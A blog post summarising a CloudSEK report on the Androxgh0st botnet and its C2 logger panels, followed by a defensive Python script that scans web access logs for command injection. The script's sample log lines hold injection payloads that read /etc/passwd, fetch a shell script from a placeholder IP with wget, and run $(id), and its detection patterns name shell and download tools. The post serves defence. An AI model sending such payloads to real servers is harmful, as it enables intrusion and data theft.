
Androxgh0st Continues Exploitation: Operators Compromise a US University For Hosting C2 Logger


Executive Summary

CloudSEK’s recent investigation reveals that the Androxgh0st botnet has evolved significantly since its early activity in 2023, leveraging a wide range of Initial Access Vectors (IAVs). Misconfigured or vulnerable servers linked to academic institutions and public domains, such as the University of California, San Diego’s “USArhythms” subdomain, were found hosting command-and-control (C2) logger panels. The botnet exploits popular platforms (e.g., Apache Shiro, the Spring framework, WordPress) and IoT devices (Lantronix), enabling remote code execution, sensitive data theft, and cryptomining. Evidence from the C2 logs highlights exploitation attempts using a plethora of command injection techniques. Webshells planted on compromised infrastructure facilitate persistent access and further payload deployment.
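The summary notes that the recovered C2 logs were full of command-injection attempts against web-facing services. A defender reviewing their own web server logs for the same pattern needs a triage pass that percent-decodes each request and flags query strings carrying shell operators or follow-on commands. The script below is an added example written for this post, not code from the CloudSEK report or the botnet's operators; the access-log lines, IP addresses and URLs in it are constructed for demonstration, and the indicator lists are generic choices rather than identifiers taken from the report.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access-log lines for demonstration; not from the report.
SAMPLE_LOGS = [
    '203.0.113.10 - - [01/Jan/2025:10:00:00 +0000] "GET /index.php?page=home&id=5 HTTP/1.1" 200 512',
    '203.0.113.11 - - [01/Jan/2025:10:00:01 +0000] "GET /cgi-bin/status?host=127.0.0.1;cat%20/etc/passwd HTTP/1.1" 200 88',
    '203.0.113.12 - - [01/Jan/2025:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
    '203.0.113.13 - - [01/Jan/2025:10:00:03 +0000] "GET /ping?ip=1.1.1.1%7C%7Cwget%20http://198.51.100.5/x.sh HTTP/1.1" 500 0',
    '203.0.113.14 - - [01/Jan/2025:10:00:04 +0000] "GET /search?q=%24%28id%29 HTTP/1.1" 200 300',
]

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Operators that turn a parameter value into a second shell command.
# A single '&' is a normal query-string separator, so only '&&' counts.
OPERATOR_RE = re.compile(r'[;|`]|&&|\$\(')
# Commands commonly seen after such an operator (dropper fetch, recon, file read).
KEYWORD_RE = re.compile(r'\b(?:wget|curl|chmod|bash|sh|nc|id|whoami|uname|cat)\b', re.IGNORECASE)
# File paths that only make sense as exfiltration targets in a query string.
SENSITIVE_PATH_RE = re.compile(r'/etc/(?:passwd|shadow)')


def decode_target(target, rounds=3):
    """Percent-decode up to `rounds` times so double-encoded payloads are normalised too."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def analyze_line(line):
    """Return a finding dict when the query string looks like command injection, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode_target(m.group('target'))
    query = target.partition('?')[2]
    if not query:
        return None
    has_operator = bool(OPERATOR_RE.search(query))
    sensitive = bool(SENSITIVE_PATH_RE.search(query))
    if not (has_operator or sensitive):
        return None  # keywords alone (e.g. "?id=5") are not enough to flag a request
    keywords = sorted({k.lower() for k in KEYWORD_RE.findall(query)})
    severity = 'high' if has_operator and (keywords or sensitive) else 'medium'
    return {
        'ip': m.group('ip'),
        'status': int(m.group('status')),
        'target': target,
        'keywords': keywords,
        'sensitive_path': sensitive,
        'severity': severity,
    }


def scan_logs(lines):
    """Run analyze_line over an iterable of log lines and keep only the findings."""
    findings = []
    for line in lines:
        finding = analyze_line(line)
        if finding:
            findings.append(finding)
    return findings


if __name__ == '__main__':
    for f in scan_logs(SAMPLE_LOGS):
        print(f"{f['severity']:<6} {f['ip']:<14} {f['target']}  keywords={f['keywords']}")
```

The decoding loop matters more than the pattern list: attackers routinely double-encode metacharacters, and a single `unquote` would let `%2524%2528id%2529` pass as harmless text. The response status is kept in each finding because a 200 on a flagged request is what deserves a follow-up on the host, while a string of 404s and 500s more often indicates scanning that never landed.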

To read the complete article see: Androxgh0st Continues Exploitation: Operators Compromise a US University For Hosting C2 Logger

This post is licensed under CC BY 4.0 by the author.